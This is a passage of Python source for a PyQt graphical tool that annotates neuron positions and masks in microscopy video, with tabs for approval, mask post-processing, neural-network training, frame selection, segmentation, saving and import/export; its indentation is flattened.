self.delete_select_from = QLineEdit("0")
self.delete_select_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.delete_select_from, subrow, 1)
self.delete_select_to = QLineEdit(str(frame_num - 1))
self.delete_select_to.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.delete_select_to, subrow, 2)
subrow += 1
self.approve_select = QPushButton("Approve Within")
self.approve_select.setStyleSheet("background-color: green")
self.approve_select.clicked.connect(self._selective_approve)
self.approve_select.setEnabled(False)
approve_lay.addWidget(self.approve_select, subrow, 0)
self.approve_select_from = QLineEdit("0")
self.approve_select_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.approve_select_from, subrow, 1)
self.approve_select_to = QLineEdit(str(frame_num - 1))
self.approve_select_to.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.approve_select_to, subrow, 2)
subrow += 1
main_layout.addLayout(approve_lay, row, 0)
row += 1
rotate_lay = QGridLayout()
main_layout.addLayout(rotate_lay, row, 0)
row += 1
fh_checkbox = QCheckBox("Follow Highlighted")
fh_checkbox.setChecked(True)
fh_checkbox.toggled.connect(self.controller.toggle_z_follow_highlighted)
main_layout.addWidget(fh_checkbox, row, 0)
row += 1
AutoCenterMode = QGridLayout()
if True:
AutoCenterWidget1 = QHBoxLayout()
en_AutoCenter = QLabel("Auto Center Size:")
getSize_AutoCenter = QLineEdit("3")
getSize_AutoCenter.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
getSize_AutoCenter.setValidator(QtGui.QIntValidator(0, 10))
getSize_AutoCenter.textChanged.connect(self._set_xy_autocenter)
getSize_AutoCenterz = QLineEdit("2")
getSize_AutoCenterz.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
getSize_AutoCenterz.setValidator(QtGui.QIntValidator(0, 5))
getSize_AutoCenterz.textChanged.connect(self._set_z_autocenter)
self.autocenterlabxy = QLabel("3")
self.autocenterlabz = QLabel("2")
AutoCenterWidget1_btn = QRadioButton("Nearest maximum intensity")
AutoCenterWidget1.addWidget(en_AutoCenter)
AutoCenterWidget1.addWidget(QLabel("X,Y:"))
AutoCenterWidget1.addWidget(self.autocenterlabxy)
AutoCenterWidget1.addWidget(getSize_AutoCenter)
AutoCenterWidget1.addWidget(QLabel("Z:"))
AutoCenterWidget1.addWidget(self.autocenterlabz)
AutoCenterWidget1.addWidget(getSize_AutoCenterz)
AutoCenterWidget2 = QHBoxLayout()
getthres_peaks = QLineEdit("4")
getthres_peaks.setValidator(QtGui.QIntValidator(0, 255))
getthres_peaks.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
getthres_peaks.textChanged.connect(self._set_peak_thresh)
self.peak_thres_lab = QLabel("4")
getsep_peaks = QLineEdit("2")
getsep_peaks.setValidator(QtGui.QIntValidator(0, 10))
getsep_peaks.textChanged.connect(self._set_peak_sep)
getsep_peaks.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
self.peak_sep_lab = QLabel("2")
AutoCenterWidget2.addWidget(QLabel("Intensity Threshold:"))
AutoCenterWidget2.addWidget(self.peak_thres_lab)
AutoCenterWidget2.addWidget(getthres_peaks)
AutoCenterWidget2.addWidget(QLabel("Minimum Separation:"))
AutoCenterWidget2.addWidget(self.peak_sep_lab)
AutoCenterWidget2.addWidget(getsep_peaks)
AutoCenterWidget2_btn = QRadioButton("Nearest Peak")
AutoCenterWidget2_btn.setChecked(True)
AutoCenterWidget2_btn.toggled.connect(self.controller.toggle_autocenter_peakmode)
autocenter_enable_lay = QHBoxLayout()
autocenter_enable_lay.addWidget(QLabel("Autocenter Enabled [A]:"))
self.auto_en_lab = QLabel(" ")
self.auto_en_lab.setStyleSheet("background-color: green; height: 5px; width: 5px;min-width: 5px;")
autocenter_enable_lay.addWidget(self.auto_en_lab)
rowi = 0
AutoCenterMode.addLayout(autocenter_enable_lay, rowi, 0, 1, 2)
rowi += 1
AutoCenterMode.addWidget(QLabel(" "), rowi, 0)
AutoCenterMode.addWidget(QLabel("Select Auto Center Mode"), rowi, 1)
rowi += 1
AutoCenterMode.addWidget(AutoCenterWidget2_btn, rowi, 1)
rowi += 1
AutoCenterMode.addLayout(AutoCenterWidget2, rowi, 1)
rowi += 1
AutoCenterMode.addWidget(AutoCenterWidget1_btn, rowi, 1)
rowi += 1
AutoCenterMode.addLayout(AutoCenterWidget1, rowi, 1)
rowi += 1
main_layout.addLayout(AutoCenterMode, row, 0)
row += 1
else:
# mask_lab = QLabel("------------ Mask mode ------------")
# main_layout.addWidget(mask_lab, row, 0)
# row += 1
# SJR: Annotate mask section in the annotate tab
mask_annotation_Layout = QGridLayout()
subrow=0
mask_annotation_checkbox = QCheckBox("Mask annotation mode")
mask_annotation_checkbox.toggled.connect(self.controller.toggle_mask_annotation_mode)
mask_annotation_Layout.addWidget(mask_annotation_checkbox,subrow, 0)
self.mask_annotation_thresh = QLineEdit(mask_threshold_for_new_region)
self.mask_annotation_thresh.setValidator(QtGui.QIntValidator(1, 1000))
self.mask_annotation_thresh.textChanged.connect(lambda x: self.controller.set_mask_annotation_threshold(x))
mask_annotation_Layout.addWidget(self.mask_annotation_thresh,subrow, 1)
mask_annotation_thresh_label = QLabel("Treshold for adding regions")
mask_annotation_Layout.addWidget(mask_annotation_thresh_label,subrow, 2)
subrow += 1
box_mode_checkbox = QCheckBox("Boxing mode")
box_mode_checkbox.toggled.connect(self.controller.toggle_box_mode)
mask_annotation_Layout.addWidget(box_mode_checkbox,subrow, 0)
self.box_dimensions = QLineEdit("1,1,1-0")
self.box_dimensions.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
self.box_dimensions.textChanged.connect(lambda x: self.controller.set_box_dimensions(x))
mask_annotation_Layout.addWidget(self.box_dimensions,subrow, 1)
boxing_dim_label = QLabel("Box details (W,H,D-box_id)")
mask_annotation_Layout.addWidget(boxing_dim_label,subrow, 2)
main_layout.addLayout(mask_annotation_Layout, row, 0)
row += 1
mask_buttons = QGridLayout()
subrow=0
self.change_within_checkbox = QCheckBox("Change within")
mask_buttons.addWidget(self.change_within_checkbox, subrow, 0)
self.mask_change_from = QLineEdit("0")
self.mask_change_from .setValidator(QtGui.QIntValidator(0, frame_num -1))
mask_buttons.addWidget(self.mask_change_from , subrow, 1)
mask_buttons.addWidget(QLabel("to:"), subrow, 2)
self.mask_change_to = QLineEdit(str(frame_num))
self.mask_change_to.setValidator(QtGui.QIntValidator(0, frame_num))
mask_buttons.addWidget(self.mask_change_to, subrow, 3)
subrow += 1
self.renumber_mask_obj = QPushButton("Renumber")
self.renumber_mask_obj.setStyleSheet("background-color: green")
self.renumber_mask_obj.clicked.connect(self._selective_renumber)
self.renumber_mask_obj.setEnabled(False)
mask_buttons.addWidget(self.renumber_mask_obj, subrow, 0)
self.delete_mask_obj = QPushButton("Delete")
self.delete_mask_obj.setStyleSheet("background-color: red")
self.delete_mask_obj.clicked.connect(self._selective_mask_delete)
self.delete_mask_obj.setEnabled(False)
mask_buttons.addWidget(self.delete_mask_obj, subrow, 1)
main_layout.addLayout(mask_buttons, row, 0)
row += 1
Permute_buttons = QGridLayout()
self.cell_permutation_entry = QLineEdit("0")
self.cell_permutation_entry.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
Permute_buttons.addWidget(QLabel("Enter cell numbers separated with ,"), 0, 0)
Permute_buttons.addWidget(self.cell_permutation_entry, 0, 1)
Permute_btn = QPushButton("Permute")
Permute_btn.setStyleSheet("background-color: yellow")
Permute_btn.clicked.connect(self._Permutation_fun)
Permute_buttons.addWidget(Permute_btn, 0, 2)
main_layout.addLayout(Permute_buttons, row, 0)
wid = QWidget()
wid.setLayout(main_layout)
self.setWidget(wid)
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
def _selective_delete(self):
fro, to = int(self.delete_select_from.text()), int(self.delete_select_to.text())
self.controller.clear_NN_selective(fro, to)
def _selective_approve(self):
fro, to = int(self.approve_select_from.text()), int(self.approve_select_to.text())
self.controller.approve_selective(fro, to)
def _selective_renumber(self):
fro, to = int(self.mask_change_from.text()), int(self.mask_change_to.text())
if self.change_within_checkbox.checkState():
self.controller.renumber_All_mask_instances(fro,to)
else:
self.controller.renumber_mask_obj()
def _selective_mask_delete(self):
fro, to = int(self.mask_change_from.text()), int(self.mask_change_to.text())
if self.change_within_checkbox.checkState():
self.controller.delete_All_mask_instances(fro,to)
else:
self.controller.delete_mask_obj()
def _Permutation_fun(self):
cells = self.cell_permutation_entry.text()
cells = cells.split(',')
cellarray = [int(k) for k in cells]
cellarraycycle = np.zeros(len(cellarray)+1)
cellarraycycle[:-1]=cellarray
cellarraycycle[len(cellarray)] = cellarray[0]
self.controller.permute_masks(cellarraycycle)
def _set_xy_autocenter(self, value):
try:
int(value)
except:
return
self.autocenterlabxy.setText(value)
self.controller.set_autocenter(int(value), z=False)
def _set_z_autocenter(self, value):
try:
int(value)
except:
return
self.autocenterlabz.setText(value)
self.controller.set_autocenter(int(value), z=True)
def _set_peak_thresh(self, value):
try:
value = int(value)
except:
return
self.controller.set_peak_threshold(value)
self.peak_thres_lab.setText(str(value))
def _set_peak_sep(self, value):
try:
value = int(value)
except:
return
self.controller.set_peak_sep(value)
self.peak_sep_lab.setText(str(value))
def change_mask_thresh(self, value):
self.mask_annotation_thresh.blockSignals(True)
self.mask_annotation_thresh.setText(str(value))
self.mask_annotation_thresh.blockSignals(False)
def change_highlighted_neuron(self, high: int=None, unhigh:int=None, high_key=None, **kwargs):
"""
Callback when the highlighted neuron changes.
:param high: neuron id (from 1)
:param unhigh: neuron id (from 1)
:param high_key: key assigned to highlighted neuron (for display on the "approve" label)
"""
if high is None and unhigh is not None: # just unghlight
if self.as_points:
self.approve_lab.setText("Approve")
self.delete_select.setEnabled(False)
self.approve_select.setEnabled(False)
else:
self.renumber_mask_obj.setEnabled(False)
self.delete_mask_obj.setEnabled(False)
elif high is not None:
if high_key is None:
key_name = " "
else:
key_name = " [" + high_key + "]"
if self.as_points:
self.approve_lab.setText("Approve: " + str(high) + key_name)
self.delete_select.setEnabled(True)
self.approve_select.setEnabled(True)
else:
self.renumber_mask_obj.setEnabled(True)
self.delete_mask_obj.setEnabled(True)
def change_autocenter_mode(self, on:bool):
if not self.as_points:
return
if on:
self.auto_en_lab.setStyleSheet("background-color: green; height: 15px; width: 5px;min-width: 5px;")
else:
self.auto_en_lab.setStyleSheet("background-color: red; height: 15px; width: 5px;min-width: 5px;")
class NNControlTab(QScrollArea):
"""
This is the tab that deals with NNs, launching them, retrieving their results...
"""
def __init__(self, controller, data_name:str):
"""
:param controller: main controller to report to
:param data_name: name of the dataset
"""
super().__init__()
self.controller = controller
self.controller.NN_instances_registered_clients.append(self)
self.controller.validation_set_registered_clients.append(self)
self.data_name = data_name
as_points = self.controller.point_data
self.as_points = as_points
main_layout = QGridLayout()
row = 0
if as_points:
# CFP-HELP:in the link below I think I should give the controller to the TrackTab object, basically some communication channel from this widget to everything else.
# AD Done. You are right, the controller is the communication channel. If the TrackTab wants to do anything to the data (or gui),
# it must be done by calling a method of the controller, then the controller will do what must be done.
self.widget=TrackTab(self.controller)
main_layout.addWidget(self.widget)
#CFP-HELP:Here I need a QCombobox to select a helper(NN result or output of other algorithms) then give it to NN_pointdat.
# AD not sure what do you want help with? adding the QCombobox? or calling the right methods (please explain)?
# Todo move into TrackTab
lab = QLabel("Select helper data")
main_layout.addWidget(lab)
self.NN_pt_select = QComboBox()
self.NN_pt_select.currentTextChanged.connect(self._select_pt_instance)
self.populate_point_NNinstances()
main_layout.addWidget(self.NN_pt_select)
else:
# and this is to select NN from which to load masks
lab = QLabel("Select NN masks")
main_layout.addWidget(lab, row, 0, 1, 2)
row += 1
self.NN_mask_select = QComboBox()
self.NN_mask_select.currentTextChanged.connect(self._select_mask_instance)
main_layout.addWidget(self.NN_mask_select, row, 0, 1, 2)
row += 1
self.Exempt_Neurons = QLineEdit("0")
self.Exempt_Neurons.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
#self.PostProc_Mode = QLineEdit("1")
#self.PostProc_Mode.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
main_layout.addWidget(QLabel("Neurons exempt from postprocessing:"),row,0,1, 1) # TODO MB: exempt for modes 1-2, but target for modes 3-4-5, right? I think we can change the label. Possibly we can even change the label depending on which mode is selected.
main_layout.addWidget(self.Exempt_Neurons,row,1, 1, 1)
row += 1
#tab for determining different post processing modes
PostProcess_mask = QPushButton("Post-process masks")
PostProcess_mask.setStyleSheet("background-color: yellow")
PostProcess_mask.clicked.connect(self._Postprocess_NN_masks)
main_layout.addWidget(PostProcess_mask,row, 1,1,1)
self.PostProc_Mode = QComboBox()
self.PostProc_Mode.addItem("Post-processing mode")
self.post_process_mode_name = ['merge neighbors','merge neighbors XY','merge selected cells',
'delete disjoint', 'relabel neighbors to 1st']
for i in range(1,6):
self.PostProc_Mode.addItem(self.post_process_mode_name[i-1])
self.PostProc_Mode.currentTextChanged.connect(self._select_pmode)
main_layout.addWidget(self.PostProc_Mode,row,0, 1, 1)
row += 1
#MB added to save the selected predicted masks as the GT masks
approve_mask = QPushButton("Approve masks")
approve_mask.setStyleSheet("background-color: green")
approve_mask.clicked.connect(self.controller.approve_NN_masks)
main_layout.addWidget(approve_mask,row, 0,1, 2)
row += 1
# MB added: to get the validation frames ids:
#CFP: made this conditional to masks
val_frame_box = QtHelpers.CollapsibleBox("Validation frames id:") # MB added
lay = QVBoxLayout()
self.val_set_display = QLabel()
self.val_set_display.setText("unknown at init")
lay.addWidget(self.val_set_display)
val_frame_box.setContentLayout(lay)
main_layout.addWidget(val_frame_box, row, 0, 1, 2)
row += 1
old_train_checkbox = QCheckBox("Use old train set")
old_train_checkbox.toggled.connect(self.controller.toggle_old_trainset)
main_layout.addWidget(old_train_checkbox, row, 0)
deform_checkbox = QCheckBox("Add deformation")
deform_checkbox.toggled.connect(self.controller.toggle_add_deformation)
main_layout.addWidget(deform_checkbox,row , 1)
row += 1
main_layout.addWidget(QLabel("Number of target frames:"), row, 0)
self.targset = QLineEdit("5")
self.targset.setValidator(QtGui.QIntValidator(0, 200))
main_layout.addWidget(self.targset, row, 1)
row += 1
subrow = 0
options_checkboxes_lay = QGridLayout()
options_checkboxes_lay.addWidget(QLabel("val:"), subrow, 0)
self.valset = QLineEdit("1")
self.valset.setValidator(QtGui.QIntValidator(0, 150))
options_checkboxes_lay.addWidget(self.valset, subrow, 1)
options_checkboxes_lay.addWidget(QLabel("train:"), subrow, 2)
self.trainset = QLineEdit("6")
self.trainset.setValidator(QtGui.QIntValidator(0, 150))
options_checkboxes_lay.addWidget(self.trainset, subrow, 3)
options_checkboxes_lay.addWidget(QLabel("epochs:"), subrow, 4)
self.epochs = QLineEdit("100")
self.epochs.setValidator(QtGui.QIntValidator(0, 1000))
options_checkboxes_lay.addWidget(self.epochs, subrow, 5)
subrow += 2
main_layout.addLayout(options_checkboxes_lay, row, 0)
row += 1
NN_train = QPushButton("Train Mask Prediction Neural Network")
NN_train.clicked.connect(self._run_mask_NN)
NN_train_fol = QPushButton("Output Train NNmasks folder")
NN_train_fol.clicked.connect(lambda: self._run_mask_NN(fol=True))
main_layout.addWidget(NN_train, row, 0, 1, 2)
row += 1
main_layout.addWidget(NN_train_fol, row, 0, 1, 2)
row += 1
main_layout.addWidget(QLabel("Settings"), row, 0, 1, 2)
row += 1
self.NN_model_select = QComboBox()
self.NN_instance_select = QComboBox()
self.change_NN_instances()
self.setup_mask_NNmodels() # populate the self.NN_model_select with the existing models
self.populate_mask_NNinstances()
self.NN_model_select.currentTextChanged.connect(self.populate_mask_NNinstances)
main_layout.addWidget(self.NN_model_select, row, 0)
main_layout.addWidget(self.NN_instance_select, row, 1)
row += 1
wid = QWidget()
wid.setLayout(main_layout)
self.setWidget(wid)
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
@property
def NNinstances(self):
"""
Gets the NNinstances dict directly from the controller.
Warning, this means self should never modify self.NNinstances.
"""
return self.controller.NNinstances
def _select_pt_instance(self, txt):
if txt == "" or txt == "None":
helper_name = None
else:
helper_name = txt
self.controller.select_NN_instance_points(helper_name)
def _select_mask_instance(self, txt):
if txt == "":
net, instance = "", None
else:
net, instance = txt.split(" ")
self.controller.select_NN_instance_masks(net, instance)
def _select_pmode(self, txt):
if txt == "":
self.post_process_mode = 1
else:
self.post_process_mode = int(self.post_process_mode_name.index(txt)+1)
def _run_script(self):
pass
def _run_mask_NN(self, fol=False):
modelname = self.NN_model_select.currentText()
instancename = self.NN_instance_select.currentText()
if instancename == "new":
text, ok = QInputDialog.getText(self, 'Name your instance', 'Instance Name: ') # TODO AD is self ok here or should it be another class of Qt thing?
if not ok:
return
if any([el in text for el in ["\n"," ",".","/","\t"]]) or text=="new":
errdial=QErrorMessage()
errdial.showMessage('Invalid Instance Name')
errdial.exec_()
else:
instancename=text
msgBox = QMessageBox()
msgBox.setText("Confirm Neural Network Run:\n"+modelname+" on "+self.data_name+" named "+instancename)
msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
confirmation = msgBox.exec()
if confirmation == QMessageBox.Ok:
runres, msg = self.controller.run_NN_masks(modelname, instancename, fol, int(self.epochs.text()),
int(self.trainset.text()), int(self.valset.text()),
int(self.targset.text()))
if not runres:
errdial=QErrorMessage()
errdial.showMessage('Run Failed:\n'+msg)
errdial.exec_()
else:
dial=QMessageBox()
dial.setText('Run Success\n'+msg)
dial.exec_()
def setup_mask_NNmodels(self):
"""
Populates the list of NN models with models existing in self.controller.
Only for initialization (list of NN models is fixed).
"""
self.NN_model_select.clear()
for modelname in self.controller.NNmodels:
self.NN_model_select.addItem(modelname)
def populate_mask_NNinstances(self):
"""
Populates the list of selectable NN instances with existing instances for current model and new.
"""
self.NN_instance_select.clear()
currname = self.NN_model_select.currentText()
self.NN_instance_select.addItem("new")
if currname in self.NNinstances:
for instance in self.NNinstances[currname]:
self.NN_instance_select.addItem(instance)
def populate_point_NNinstances(self):
self.NN_pt_select.clear()
currname = self.NN_pt_select.currentText()
helper_names = self.controller.available_method_results()
self.NN_pt_select.addItem("None")
for name in helper_names:
self.NN_pt_select.addItem(name)
if currname in helper_names:
self.NN_pt_select.setCurrentText(currname)
def change_NN_instances(self):
"""
Callback when new instances of NNs are created (or deleted?).
"""
if not self.as_points:
self.populate_mask_NNinstances()
self.NN_mask_select.clear()
self.NN_mask_select.addItem("")
for net, insts in self.NNinstances.items():
for inst in insts:
self.NN_mask_select.addItem(net + " " + inst)
else:
self.populate_point_NNinstances()
def change_validation_set(self, validation_set):
self.val_set_display.setText(str(validation_set))
def _Postprocess_NN_masks(self):
ExNeu = self.Exempt_Neurons.text()
ExNeu = ExNeu.split(',')
ExNeu = [int(n) for n in ExNeu ]
Mode = self.post_process_mode#int(self.PostProc_Mode.text())
Modes = set([1,2,3,4,5])
assert Mode in Modes, "Acceptable modes are 1, 2, 3, 4, and 5"
self.controller.post_process_NN_masks(Mode, ExNeu)
class SelectionTab(QScrollArea):
"""
This is the tab that allows to select subsets of data
"""
def __init__(self, controller):
"""
:param controller: main controller to report to
"""
super().__init__()
self.controller = controller
main_layout = QVBoxLayout()
all_correct_btn = QPushButton("Flag all selected frames as ground truth")
all_correct_btn.clicked.connect(self.controller.flag_all_selected_as_gt)
main_layout.addWidget(all_correct_btn)
use_as_ref_btn = QPushButton("Use this frame as reference") # (for registration)
use_as_ref_btn.clicked.connect(self.controller.use_current_as_ref)
main_layout.addWidget(use_as_ref_btn)
selection_lay = QGridLayout()
# select proportion of frames
self.frac_entry = QLineEdit("100")
self.frac_entry.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
self.frac_entry.setValidator(QtGui.QIntValidator(0, 100))
selection_lay.addWidget(self.frac_entry, 0, 0)
selection_lay.addWidget(QLabel("% of"), 0, 1)
#MB added to selet individual frames manually
self.fr_num_entry = QLineEdit("0")
self.fr_num_entry.setStyleSheet("height: 15px; width: 5px;min-width: 150px;")
selection_lay.addWidget(QLabel("Enter frame numb-\n ers separated\n with ,"), 1, 0)
selection_lay.addWidget(self.fr_num_entry, 1, 1)
# select population of frames from which to select this proportion
buttons_layout = QVBoxLayout()
self.population_buttons = QButtonGroup() # widget
all_radiobtn = QRadioButton("all")
all_radiobtn.setChecked(True)
self.population_buttons.addButton(all_radiobtn)
buttons_layout.addWidget(all_radiobtn)
segmented_radiobtn = QRadioButton("segmented")
segmented_radiobtn.setChecked(False)
self.population_buttons.addButton(segmented_radiobtn)
buttons_layout.addWidget(segmented_radiobtn)
non_segmented_radiobtn = QRadioButton("non segmented")
non_segmented_radiobtn.setChecked(False)
self.population_buttons.addButton(non_segmented_radiobtn)
buttons_layout.addWidget(non_segmented_radiobtn)
ground_truth_radiobtn = QRadioButton("ground truth")
ground_truth_radiobtn.setChecked(False)
self.population_buttons.addButton(ground_truth_radiobtn)
buttons_layout.addWidget(ground_truth_radiobtn)
non_ground_truth_radiobtn = QRadioButton("non ground truth")
non_ground_truth_radiobtn.setChecked(False)
self.population_buttons.addButton(non_ground_truth_radiobtn)
buttons_layout.addWidget(non_ground_truth_radiobtn)
single_radiobtn = QRadioButton("manual selection")
single_radiobtn.setChecked(False)
self.population_buttons.addButton(single_radiobtn)
buttons_layout.addWidget(single_radiobtn)
selection_lay.addLayout(buttons_layout, 0, 2)
select_btn = QPushButton("Select")
select_btn.clicked.connect(self._frame_fraction_fun)
selection_lay.addWidget(select_btn, 0, 3)
main_layout.addLayout(selection_lay)
wid = QWidget()
wid.setLayout(main_layout)
self.setWidget(wid)
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
# Todo no sideways scrolling
def _frame_fraction_fun(self):
frac = self.frac_entry.text()
frames = self.fr_num_entry.text()
frames = frames.split(',')
Tot_fr = set()
for i in range(len(frames)):
interval_str = frames[i].split('-')
if len(interval_str)>1:
interval_array = range(int(interval_str[0]),int(interval_str[1])+1)
Tot_fr = Tot_fr.union(set(interval_array))
else:
Tot_fr = Tot_fr.union(set(interval_str))
Tot_fr_final = [int(fr) for fr in Tot_fr]
self.controller.select_frames(float(frac)/100, Tot_fr_final, self.population_buttons.checkedButton().text())
class MaskProcessingTab(QScrollArea):
"""
This is the tab that controls all processes specific to data with masks (though not just masks themselves): segmentation, clustering...
"""
def __init__(self, controller):
"""
:param controller: main controller to report to
"""
super().__init__()
self.controller = controller
self.seg_params = self.controller.get_seg_params()
self.cluster_params = self.controller.get_cluster_params()
# Warning, these two are the real dict from the dataset, can be modified but it's useless to try reassigning the variables
# todo AD: could also be refactored in terms of just calling the controller and registering to the controller
# for changes of params (but it's less practical)
main_layout = QGridLayout()
# segmentation parameters
seg_param_box = QtHelpers.CollapsibleBox("Segmentation parameters")
lay = QVBoxLayout()
seg_param_tree = ParameterTree()
params = [{'name': k, 'value': v, **Parameters.pyqt_param_keywords(k)} for k, v in
self.seg_params.items()]
seg_params = Parameter.create(name='params', type='group', children=params)
seg_param_tree.setParameters(seg_params, showTop=False)
lay.addWidget(seg_param_tree)
def change_seg_pars(param, changes): # Todo: as method
for param, change, data in changes:
self.seg_params.update({param.name(): data})
seg_params.sigTreeStateChanged.connect(change_seg_pars)
seg_param_box.setContentLayout(lay)
main_layout.addWidget(seg_param_box)
# Segmentation buttons
init_seg_btn = QPushButton("Test segmentation on current frame")
init_seg_btn.clicked.connect(self.controller.test_segmentation_params)
main_layout.addWidget(init_seg_btn)
seg_lay = QHBoxLayout()
coarse_seg_btn = QCheckBox("Coarse segmentation")
coarse_seg_btn.setChecked(False)
coarse_seg_btn.toggled.connect(self.controller.toggle_coarse_seg_mode)
seg_btn = QPushButton("Segmentation")
seg_btn.clicked.connect(self.controller.segment)
seg_lay.addWidget(seg_btn)
seg_lay.addWidget(coarse_seg_btn)
dum = QWidget()
dum.setLayout(seg_lay)
main_layout.addWidget(dum)
ftr_lay = QHBoxLayout()
ftr_from_seg_check = QCheckBox("from segmentations")
ftr_from_seg_check.setChecked(False)
ftr_from_seg_check.toggled.connect(self.controller.toggle_use_seg_for_feature)
ftr_btn = QPushButton("Extract features")
ftr_btn.clicked.connect(self.controller.extract_features)
ftr_lay.addWidget(ftr_btn)
ftr_lay.addWidget(ftr_from_seg_check)
dum2 = QWidget()
dum2.setLayout(ftr_lay)
main_layout.addWidget(dum2)
# clustering parameters
cluster_param_box = QtHelpers.CollapsibleBox("Clustering parameters")
lay = QVBoxLayout()
cluster_param_tree = ParameterTree()
params = [{'name': k, 'value': v, **Parameters.pyqt_param_keywords(k)} for k, v in
self.cluster_params.items()]
cluster_params = Parameter.create(name='params', type='group', children=params)
cluster_param_tree.setParameters(cluster_params, showTop=False)
lay.addWidget(cluster_param_tree)
def change_cluster_pars(param, changes): # Todo: as method
for param, change, data in changes:
self.cluster_params.update({param.name(): eval(data) if isinstance(data, str) else data})
cluster_params.sigTreeStateChanged.connect(change_cluster_pars)
cluster_param_box.setContentLayout(lay)
main_layout.addWidget(cluster_param_box)
# remaining processing buttons
cluster_btn = QPushButton("Cluster")
cluster_btn.clicked.connect(self.controller.cluster)
main_layout.addWidget(cluster_btn)
clf_btn = QPushButton("Classify")
clf_btn.clicked.connect(self.controller.classify)
main_layout.addWidget(clf_btn)
reg_btn = QPushButton("Auto add to ground truth")
reg_btn.clicked.connect(self.controller.auto_add_gt_by_registration)
main_layout.addWidget(reg_btn)
rotation_btn = QPushButton("Compute rotation")
rotation_btn.clicked.connect(self.controller.compute_rotation)
main_layout.addWidget(rotation_btn)
coarot_btn = QPushButton("Coarse segmentation + rotation")
coarot_btn.clicked.connect(self.controller.segment)
coarot_btn.clicked.connect(self.controller.compute_rotation)
main_layout.addWidget(coarot_btn)
crop_btn = QPushButton("Crop")
crop_btn.clicked.connect(self.controller.define_crop_region)
main_layout.addWidget(crop_btn)
wid = QWidget()
wid.setLayout(main_layout)
self.setWidget(wid)
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
class SavingTab(QScrollArea):
"""
This is the tab for saving etc
"""
def __init__(self, controller):
"""
:param controller: main controller to report to
"""
super().__init__()
self.controller = controller
main_layout = QGridLayout()
row = 0
en_AutoSave = QCheckBox("Enable Auto Save")
en_AutoSave.setChecked(False)
en_AutoSave.toggled.connect(self.controller.toggle_autosave)
main_layout.addWidget(en_AutoSave, row, 0)
row += 1
push_button = QPushButton("ReCalculate Calcium Intensity")
push_button.clicked.connect(self.controller.update_ci)
push_button.setStyleSheet("background-color: blue")
main_layout.addWidget(push_button, row, 0)
row += 1
push_button = QPushButton("Save and Repack")
push_button.clicked.connect(self.controller.save_and_repack)
main_layout.addWidget(push_button, row, 0)
row += 1
save_button = QPushButton("Save")
save_button.clicked.connect(self.controller.save_status)
save_button.setStyleSheet("background-color: green")
main_layout.addWidget(save_button, row, 0)
row += 1
wid = QWidget()
wid.setLayout(main_layout)
self.setWidget(wid)
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
class ExportImportTab(QScrollArea):
"""
MB: This is the tab for preprocessing and saving an a separate file
"""
def __init__(self, controller, frame_num:int):
"""
:param controller: main controller to report to
:param frame_num: number of frames in video
"""
super().__init__()
self.controller = controller
preproc_tab_grid = QGridLayout()
row = 0
Import_section = QLabel("------------ Import Section -----------")
preproc_tab_grid.addWidget(Import_section, row, 0)
row += 1
subrow = 0
load_mask_lay = QGridLayout()
self.import_address = QLineEdit("0")
self.import_address.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
load_mask_lay.addWidget(QLabel("Address of the imported masks:"), subrow, 0)
load_mask_lay.addWidget(self.import_address, subrow, 1)
subrow += 1
reverse_transform_checkbox = QCheckBox("Reverse transform")
reverse_transform_checkbox.toggled.connect(self.controller.toggle_reverse_transform)
load_mask_lay.addWidget(reverse_transform_checkbox, subrow, 0)
Undo_cuts_checkbox = QCheckBox("Undo cuts")
Undo_cuts_checkbox.toggled.connect(self.controller.toggle_undo_cuts)
load_mask_lay.addWidget(Undo_cuts_checkbox, subrow, 1)
import_btn = QPushButton("import")
import_btn.clicked.connect(self.import_file)
load_mask_lay.addWidget(import_btn, subrow+1, 1)
import_green_btn = QPushButton("import as green mask")
import_green_btn.clicked.connect(self.import_file_green)
import_green_btn.setStyleSheet("background-color: green")
load_mask_lay.addWidget(import_green_btn, subrow+1, 0)
preproc_tab_grid.addLayout(load_mask_lay,row,0)
row += 1
Export_section = QLabel("------------ Export Section --------------")
preproc_tab_grid.addWidget(Export_section, row, 0)
row += 1
subrow = 0
save_checkboxes_lay = QGridLayout()
save_rotation_crop_checkbox = QCheckBox("Rotate and crop")
save_rotation_crop_checkbox.toggled.connect(self.controller.toggle_save_crop_rotate)
save_checkboxes_lay.addWidget(save_rotation_crop_checkbox, subrow, 0)
auto_delete_checkbox = QCheckBox("auto delete")
auto_delete_checkbox.toggled.connect(self.controller.toggle_auto_delete)
save_checkboxes_lay.addWidget(auto_delete_checkbox,subrow , 1)
subrow += 2
save_1channel_checkbox = QCheckBox("save red channel")
#bg_subtraction_checkbox.setChecked(int(default_values["just_show_first_channel"]))#MB changed bool to int
save_1channel_checkbox.toggled.connect(self.controller.toggle_save_1st_channel)
save_checkboxes_lay.addWidget(save_1channel_checkbox,subrow , 0)
save_green_checkbox = QCheckBox("save green channel")
save_green_checkbox.toggled.connect(self.controller.toggle_save_green_channel)
save_checkboxes_lay.addWidget(save_green_checkbox,subrow , 1)
subrow += 2
Blur_checkbox = QCheckBox("Blur")
Blur_checkbox.toggled.connect(self.controller.toggle_save_blurred)
save_checkboxes_lay.addWidget(Blur_checkbox, subrow, 0)
save_checkboxes_lay.addWidget(QLabel("background factor:"), subrow, 1)
self.bg_blur = QLineEdit("40")
